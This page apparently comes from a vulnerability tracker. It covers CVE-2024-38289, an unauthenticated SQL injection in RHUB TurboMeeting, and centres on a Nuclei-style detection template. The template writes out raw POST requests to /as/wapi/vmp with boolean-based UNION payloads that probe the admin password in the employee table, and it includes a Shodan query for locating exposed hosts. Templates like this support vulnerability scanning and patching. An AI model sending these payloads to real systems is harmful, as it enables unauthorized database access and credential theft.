CVE-2024-38289: TurboMeeting - Boolean-based SQL Injection

2025-08-01 TurboMeeting PoC Public

Description

A Boolean-based SQL injection vulnerability in the "RHUB TurboMeeting" web application. This vulnerability could allow an attacker to execute arbitrary SQL commands on the database server, potentially allowing them to access sensitive data or compromise the server.

PoC

id: CVE-2024-38289

info:
  name: TurboMeeting - Boolean-based SQL Injection
  author: rootxharsh,iamnoooob,pdresearch
  severity: critical
  description: |
    A Boolean-based SQL injection vulnerability in the "RHUB TurboMeeting" web application. This vulnerability could allow an attacker to execute arbitrary SQL commands on the database server, potentially allowing them to access sensitive data or compromise the server.
  impact: |
    Unauthenticated attackers can execute arbitrary SQL commands to extract sensitive data including user credentials, meeting information, and potentially compromise the entire TurboMeeting database.
  remediation: |
    Upgrade to the latest patched version of RHUB TurboMeeting or apply vendor-provided security updates.
  reference:
    - https://github.com/google/security-research/security/advisories/GHSA-vx5j-8pgx-v42v
  classification:
    epss-score: 0.40609
    epss-percentile: 0.98577
    cpe: cpe:2.3:a:rhubcom:turbomeeting:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: rhubcom
    product: turbomeeting
    shodan-query: html:"TurboMeeting"
  tags: cve,cve2024,sqli,turbomeeting,vkev,vuln

http:
  - raw:
      - |
        POST /as/wapi/vmp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        meeting_id=1'/**/OR/**/1=1/**/UNION/**/select/**/password/**/from/**/employee/**/where/**/email='admin'/**/AND/**/substr(password,2,1)='b'/**
      - |
        POST /as/wapi/vmp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        meeting_id=1'/**/OR/**/1=2/**/UNION/**/select/**/password/**/from/**/employee/**/where/**/email='admin'/**/AND/**/substr(password,2,1)='b'/**

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - '<__Status__>SUCCEED</__Status__>'

      - type: word
        part: body_2
        words:
          - '<__Status__>FAILED</__Status__>'
# digest: 4a0a00473045022100b6e792e6b6e6e0fedfd559e92d13ac629e3705284e2f17434e9092b26f93c96702207d10da730dda1e33d1bd3fede835961705726c8c489408b6b0bb9f15e26b1313:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities